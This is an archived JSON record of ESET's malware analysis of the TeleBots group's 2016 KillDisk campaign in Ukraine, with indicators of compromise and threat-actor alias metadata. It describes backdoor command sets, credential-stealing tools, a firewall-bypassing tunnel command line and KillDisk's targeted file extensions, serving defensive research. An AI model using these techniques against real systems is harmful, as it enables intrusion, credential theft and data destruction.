{
	"id": "5af6c274-6e87-4cdb-9fdf-809a6445c7ae",
	"created_at": "2026-04-06T00:09:51.323214Z",
	"updated_at": "2026-04-10T03:37:49.801109Z",
	"deleted_at": null,
	"sha1_hash": "2e269c4e5b0e6a3836676f0cf51642142d26828d",
	"title": "The rise of TeleBots: Analyzing disruptive KillDisk attacks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 333653,
	"plain_text": "The rise of TeleBots: Analyzing disruptive KillDisk attacks\r\nBy Anton Cherepanov\r\nArchived: 2026-04-05 14:27:54 UTC\r\nIn the second half of 2016, ESET researchers identified a unique malicious toolset that was used in targeted cyberattacks against high-value targets in the Ukrainian financial sector. We believe that the main goal of the attackers using these tools is cybersabotage. This blog post outlines the details of the campaign that we discovered.\r\nWe will refer to the gang behind the malware as TeleBots. However, it’s important to say that these attackers, and the toolset used, share a number of similarities with the BlackEnergy group, which conducted attacks against the energy industry in Ukraine in December 2015 and January 2016. In fact, we think that the BlackEnergy group has evolved into the TeleBots group.\r\nInfection vector\r\nAs with campaigns attributed to the BlackEnergy group, the attackers used spearphishing emails with attached Microsoft Excel documents containing malicious macros as the initial infection vector. This time the malicious documents don’t contain any social engineering content directing potential victims to click the Enable Content button. It seems that the attackers are depending on the victims to decide entirely on their own whether to click it or not.\r\nFigure 1: One example of a malicious XLS document used in the spearphishing attack.\r\nhttps://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/\r\nPage 1 of 13\r\nUsually, the malicious documents don’t contain meaningful information in the metadata, but this time the metadata of the document contains the nickname of the person who is responsible for its modification. Moreover, this nickname matches that of an individual who is actively communicating within a Russian-speaking community of cybercriminals. However, we should say that it is possible that this was intended deceptively as a false flag, or is a coincidence.\r\nFigure 2: Metadata reveals what might be the attacker's nickname.\r\nOnce a victim clicks on the Enable Content button, Excel executes the malicious macro. Our analysis shows that the code of the macro used in TeleBots documents matches the macro code that was used by the BlackEnergy group in 2015. Figure 3 illustrates these similarities.\r\nThe main purpose of the macro is to drop a malicious binary using the explorer.exe filename and then to execute it. The dropped binary belongs to a trojan downloader family, its main purpose being to download and execute another piece of malware. This trojan downloader is written in the Rust programming language.\r\nIt should be noted that during the first stages of the attack, the TeleBots group abuses various legitimate servers in order to hide malicious activity in the network. For example, the trojan downloader fetches data from a hardcoded URL that points to a text file on the putdrive.com service (which allows anyone to upload and share files online). The text file that is hosted on the online service is the final payload, encoded using the Base64 algorithm.\r\nThe final payload is a backdoor written in Python and detected as the Python/TeleBot.AA trojan. This backdoor is the main piece of malware used by these attackers, which is why we've named the TeleBots group as such.\r\nFigure 3: Similarities between malicious macro code used by BlackEnergy and TeleBots.\r\nPython/TeleBot.AA backdoor\r\nIn January 2016 we published our analysis of a spearphishing attack against energy companies in Ukraine. That attack probably has a connection to the infamous BlackEnergy attacks in 2015, because the attackers used exactly the same mail server to send spearphishing messages. However, the attacks in January 2016 were different. Instead of using the BlackEnergy malware family, the attackers used a relatively simple open-source backdoor, written in the Python programming language, called GCat. The Python code of the GCat backdoor was obfuscated, then converted into a stand-alone executable using the PyInstaller program.\r\nThe Python/TeleBot malware uses exactly the same approach: the Python backdoor code is obfuscated and packed into a stand-alone executable using PyInstaller. In addition, the Python code is ROT13 encoded, AES encrypted, compressed using the zlib library and then Base64 encoded.\r\nBut what really makes this backdoor interesting is the way in which it communicates with the attackers in order to receive commands. Python/TeleBot abuses the Telegram Bot API from Telegram Messenger to communicate with the attackers. The Telegram Bot API is based on HTTP, so to a network administrator within a compromised network, the communication between the infected computer and the attackers will look like HTTP(S) communication with a legitimate server, specifically api.telegram.org. We have informed Telegram of this abuse of their communication platform.\r\nFigure 4: The Python/TeleBot.AA malware code that uses the Telegram Bot API.\r\nEach of the samples we discovered has a unique token embedded in its code, which means that each sample uses its own Telegram Messenger account. Python/TeleBot uses private chats for communicating with the cybercriminals. This scheme allows the control of infected computers through any device with Telegram Messenger installed, even a smartphone, just by issuing commands via chat.\r\nThe Python/TeleBot malware supports the following commands:\r\nCommand | Purpose\r\ncmd %shellcmd% | Executes shell command and sends result in chat\r\ncmdd %shellcmd% | Executes shell command but does not send result in chat\r\ngetphoto %path% | Uploads picture from infected computer to chat\r\ngetdoc %path% | Uploads any type of file up to 50 MB in size to chat\r\nforcecheckin %random% | Collects Windows version, platform (x64 or x86), current privileges\r\ntime %seconds% | Changes interval between execution of commands\r\nss | Captures screenshot (not implemented)\r\nIn addition, the malware automatically saves all incoming files from the attacker to its own folder. By this means, attackers can push additional malicious tools to an infected computer. During our research, we were able to find a Telegram account belonging to one of the attackers.\r\nFigure 5: Profile of one of the attackers in Telegram Messenger.\r\nIt should be noted that the Telegram Bot API was not the only legitimate protocol that was used by these attackers. We have seen at least one sample of this backdoor that uses an outlook.com mailbox as C\u0026C.\r\nPassword stealing malicious tools\r\nAfter successful compromise of the network, the attackers use various malicious tools in order to collect passwords, allowing them to subsequently perform lateral movement within the compromised LAN.\r\nA string that contains a PDB path to debug symbols suggests one such tool was named CredRaptor by the attackers. This tool collects saved passwords from various browsers such as Google Chrome, Internet Explorer, Mozilla Firefox, and Opera.\r\nFigure 6: PDB path reveals the name of the password stealer.\r\nThe attackers are using a tool named plainpwd in order to dump Windows credentials from memory. This tool is a slightly modified version of the open-source project mimikatz.\r\nIn addition to plainpwd and CredRaptor, the toolkit includes a keylogger. The keylogger uses a standard technique to capture keystrokes, specifically the SetWindowsHookEx function.\r\nIn order to also sniff passwords in network traffic, the attackers use a console version of Intercepter-NG. Since it requires WinPcap drivers to be installed, the attackers made a custom tool to install them silently.\r\nFigure 7: Intercepter-NG password sniffing tool.\r\nThe combined use of all these tools allows the attackers to gain a foothold in a compromised network, with the objective of gaining full control by obtaining domain administrator privileges.\r\nLDAP query tool\r\nAnother interesting discovery was a tool that was used during attacks to make queries to Active Directory using LDAP. This tool is able to dump detailed information about computers and usernames listed in Active Directory, and is tailored for a specific victim’s domain.\r\nFigure 8: Disassembled code of the tailored LDAP query tool.\r\nAdditional backdoor\r\nFurther research revealed that the attackers deployed additional backdoors in order to regain access to the compromised network, should their main Python/TeleBot backdoor be discovered and removed. This additional backdoor is written in VBS, and some samples we discovered were packaged using the script2exe program.\r\nFigure 9: Source code of additional backdoor written in VBS.\r\nThere are several samples of this VBS backdoor, but all of them have pretty straightforward functionality. The backdoor sends the computer name and MAC address of the computer executing it to its C\u0026C server using HTTP. The variable timeout defines the period of time in minutes between calls to the server. The server can push additional commands for execution. Here is a list of supported commands:\r\nCommand | Purpose\r\n!cmd | Executes shell command and sends results back to the server\r\n!cmdd | Executes shell command but does not send result back to the server\r\n!dump | Decodes Base64 data and saves it to the %TEMP% folder\r\n!timeout | Defines a new timeout between calls to the server\r\n!bye | Quits\r\n!kill | Quits and deletes itself\r\n!up | Uploads file from agent computer to C\u0026C server\r\nBCS-server\r\nThe attackers also used a malicious tool that they named BCS-server. This tool allows them to open a tunnel into an internal network; this tunnel can then be used to send and receive data between the C\u0026C server and even non-infected computers in the network. The main idea of this tool is based on the same principles as the XTUNNEL malware used by the Sednit group.\r\nDuring our analysis we discovered that the attackers used a guide for this specific tool. Interestingly, the guide was written in Russian.\r\nFigure 10: Guide for BCS-server in Russian.\r\nThe guide in Russian can be roughly translated as:\r\nParameters\r\n-saddr – address of BCS server\r\n-hport – port of a host, which we set up on the server; this is how we bypass the firewall\r\nExamples:\r\nphost_win.exe –saddr=10.10.10.10 –hport=80\r\nDebug versions:\r\nphost_cnv.exe – console version\r\nphost_win_log.exe – version that logs to file\r\nSo the attackers specify an external C\u0026C server in the command line and the tool connects to this server using HTTP. This remote server is used as a proxy by the attackers: the connection that goes to this server is redirected to the internal network by the tool, and any response that the tool gets from a computer in the internal network goes to the C\u0026C server. Thus, the attackers can communicate with internal servers that are normally unreachable from the internet.\r\nThe communication traffic between the BCS-server tool and the C\u0026C server is Base64 encoded and encapsulated in HTML tags.\r\nFigure 11: The captured handshake of the BCS-server tool and the C\u0026C server.\r\nKillDisk\r\nKillDisk is a destructive component that is used by these attackers as the final stage of an attack. Previous versions of this component were used in attacks against media companies in November 2015 and against power grid companies in Ukraine in December 2015.\r\nKillDisk is designed to run with high privileges; this time it registers itself as a service under the name Plug-And-Play Support. Since by the final stage the attackers have probably collected network administrator level credentials, they use Microsoft PsExec in order to execute KillDisk with the highest possible privileges on servers and workstations.\r\nThe attackers may specify an activation date for KillDisk via the command line. However, one of the samples had a predefined activation time set to 9:30am, 6 December 2016.\r\nThere are improvements in the code; however, the main idea of KillDisk hasn’t changed much: it deletes important system files and makes the computer unbootable. Besides that, it also overwrites files with specific file extensions; those defined by the malware authors in this version of KillDisk are:\r\n.kdbx .bak .back .dr .bkf .cfg .fdb .mdb .accdb .gdb .wdb .csv .sdf .myd .dbf .sql .edb .mdf .ib .db3 .db4\r\n.accdc .mdbx .sl3 .sqlite3 .nsn .dbc .dbx .sdb .ibz .sqlite .pyc .dwg .3ds .ai .conf .my .ost .pst .mkv .mp3\r\n.wav .oda .sh .py .ps .ps1 .php .aspx .asp .rb .js .git .mdf .pdf .djvu .doc .docx .xls .xlsx .jar .ppt .pptx .rtf\r\n.vsd .vsdx .jpeg .jpg .png .tiff .msi .zip .rar .7z .tar .gz .eml .mail .ml .ova .vmdk .vhd .vmem .vdi .vhdx\r\n.vmx .ovf .vmc .vmfx .vmxf .hdd .vbox .vcb .vmsd .vfd .pvi .hdd .bin .avhd .vsv .iso .nrg .disk .hdd .pmf\r\n.vmdk .xvd\r\nThe KillDisk malware may create new, small files in place of the deleted ones, with exactly the same filename, and these new files will contain one of two strings, mrR0b07 or fS0cie7y, instead of the original content. This is not the only reference to the Mr. Robot TV show; in addition, this KillDisk variant displays the picture that is illustrated in Figure 12.\r\nFigure 12: Picture displayed by KillDisk component.\r\nInterestingly, the KillDisk malware does not store this picture anywhere: rather, it has code that draws this picture in real time using the Windows GDI. It looks like the attackers put a lot of effort just into writing the code that draws this picture.\r\nConclusion\r\nThe cybercriminals behind these targeted attacks demonstrate serious intention to conduct cybersabotage attacks. To be able to mount such attacks, they are constantly inventing new malware and techniques, such as, for example, the use of the Telegram Bot API instead of a more conventional C\u0026C server.\r\nSpecial thanks to David Gabris for help with the analysis.\r\nIndicators of Compromise (IoC)\r\nTeleBots IoCs are also available on ESET’s GitHub repository.\r\nESET detection names:\r\nVBA/TrojanDropper.Agent.SD trojan\r\nWin32/TrojanDownloader.Agent.CWY trojan\r\nPython/TeleBot.AA trojan\r\nPython/Agent.Q trojan\r\nPython/Agent.AE trojan\r\nPython/Agent.AD trojan\r\nVBS/Agent.AQ trojan\r\nVBS/Agent.AO trojan\r\nVBS/Agent.AP trojan\r\nWin32/HackTool.NetHacker.N trojan\r\nWin32/HackTool.NetHacker.O trojan\r\nWin32/PSW.Agent.OCO trojan\r\nWin64/Riskware.Mimikatz.H application\r\nWin32/RiskWare.Mimikatz.I application\r\nWin32/PSW.Delf.OQU trojan\r\nWin32/PSW.Agent.OCP trojan\r\nWin64/Spy.KeyLogger.G trojan\r\nWin32/KillDisk.NBH trojan\r\nWin32/KillDisk.NBI trojan\r\nC\u0026C Servers:\r\n93.190.137.212\r\n95.141.37.3\r\n80.233.134.147\r\nLegitimate servers abused by malware authors:\r\nsrv70.putdrive.com (IP: 188.165.14.185)\r\napi.telegram.org (IP: 149.154.167.200, 149.154.167.197, 149.154.167.198, 149.154.167.199)\r\nsmtp-mail.outlook.com (IP: 65.55.176.126)\r\nXLS documents with malicious macro SHA-1:\r\n7FC462F1734C09D8D70C6779A4F1A3E6E2A9CC9F\r\nC361A06E51D2E2CD560F43D4CC9DABE765536179\r\nWin32/TrojanDownloader.Agent.CWY SHA-1:\r\nF1BF54186C2C64CD104755F247867238C8472504\r\nPython/TeleBot.AA backdoor SHA-1:\r\n16C206D9CFD4C82D6652AFB1EEBB589A927B041B\r\n1DC1660677A41B6622B795A1EB5AA5E5118D8F18\r\n26DA35564D04BB308D57F645F353D1DE1FB76677\r\n30D2DA7CAF740BAAA8A1300EE48220B3043A327D\r\n385F26D29B46FF55C5F4D6BBFD3DA12EB5C33ED7\r\n4D5023F9F9D0BA7A7328A8EE341DBBCA244F72C5\r\n57DAD9CDA501BC8F1D0496EF010146D9A1D3734F\r\n68377A993E5A85EB39ADED400755A22EB7273CA0\r\n77D7EA627F645219CF6B8454459BAEF1E5192467\r\n7B87AD4A25E80000FF1011B51F03E48E8EA6C23D\r\n7C822F0FDB5EC14DD335CBE0238448C14015F495\r\n86ABBF8A4CF9828381DDE9FD09E55446E7533E78\r\n9512A8280214674E6B16B07BE281BB9F0255004B\r\nB2E9D964C304FC91DCAF39FF44E3C38132C94655\r\nFE4C1C6B3D8FDC9E562C57849E8094393075BC93\r\nVBS backdoors SHA-1:\r\nF00F632749418B2B75CA9ECE73A02C485621C3B4\r\n06E1F816CBAF45BD6EE55F74F0261A674E805F86\r\n35D71DE3E665CF9D6A685AE02C3876B7D56B1687\r\nF22CEA7BC080E712E85549848D35E7D5908D9B49\r\nC473CCB92581A803C1F1540BE2193BC8B9599BFE\r\nBCS-server SHA-1:\r\n4B692E2597683354E106DFB9B90677C9311972A1\r\nBF3CB98DC668E455188EBB4C311BD19CD9F46667\r\nModified Mimikatz SHA-1:\r\nB0BA3405BB2B0FA5BA34B57C2CC7E5C184D86991\r\nAD2D3D00C7573733B70D9780AE3B89EEB8C62C76\r\nD8614BC1D428EBABCCBFAE76A81037FF908A8F79\r\nLDAP query tool SHA-1:\r\n81F73C76FBF4AB3487D5E6E8629E83C0568DE713\r\nCredRaptor password stealer SHA-1:\r\nFFFC20567DA4656059860ED06C53FD4E5AD664C2\r\n58A45EF055B287BAD7B81033E17446EE6B682E2D\r\nWin64/Spy.KeyLogger.G trojan SHA-1:\r\n7582DE9E93E2F35F9A63B59317EBA48846EEA4C7\r\nIntercepter-NG and silent WinPcap installer SHA-1:\r\n64CB897ACC37E12E4F49C4DA4DFAD606B3976225\r\nA0B9A35675153F4933C3E55418B6566E1A5DBF8A\r\nWin32/KillDisk SHA-1:\r\n71A2B3F48828E4552637FA9753F0324B7146F3AF\r\n8EB8527562DDA552FC6B8827C0EBF50968848F1A\r\nSource: https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"ETDA"
	],
	"references": [
		"https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/"
	],
	"report_names": [
		"rise-telebots-analyzing-disruptive-killdisk-attacks"
	],
	"threat_actors": [
		{
			"id": "39842197-944a-49fd-9bec-eafa1807e0ea",
			"created_at": "2022-10-25T16:07:24.310589Z",
			"updated_at": "2026-04-10T02:00:04.931264Z",
			"deleted_at": null,
			"main_name": "TeleBots",
			"aliases": [],
			"source_name": "ETDA:TeleBots",
			"tools": [
				"BadRabbit",
				"Black Energy",
				"BlackEnergy",
				"CredRaptor",
				"Diskcoder.C",
				"EternalPetya",
				"ExPetr",
				"Exaramel",
				"FakeTC",
				"Felixroot",
				"GreyEnergy",
				"GreyEnergy mini",
				"KillDisk",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"NonPetya",
				"NotPetya",
				"Nyetya",
				"Petna",
				"Petrwrap",
				"Pnyetya",
				"TeleBot",
				"TeleDoor",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"nPetya"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434191,
	"ts_updated_at": 1775792269,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2e269c4e5b0e6a3836676f0cf51642142d26828d.pdf",
		"text": "https://archive.orkl.eu/2e269c4e5b0e6a3836676f0cf51642142d26828d.txt",
		"img": "https://archive.orkl.eu/2e269c4e5b0e6a3836676f0cf51642142d26828d.jpg"
	}
}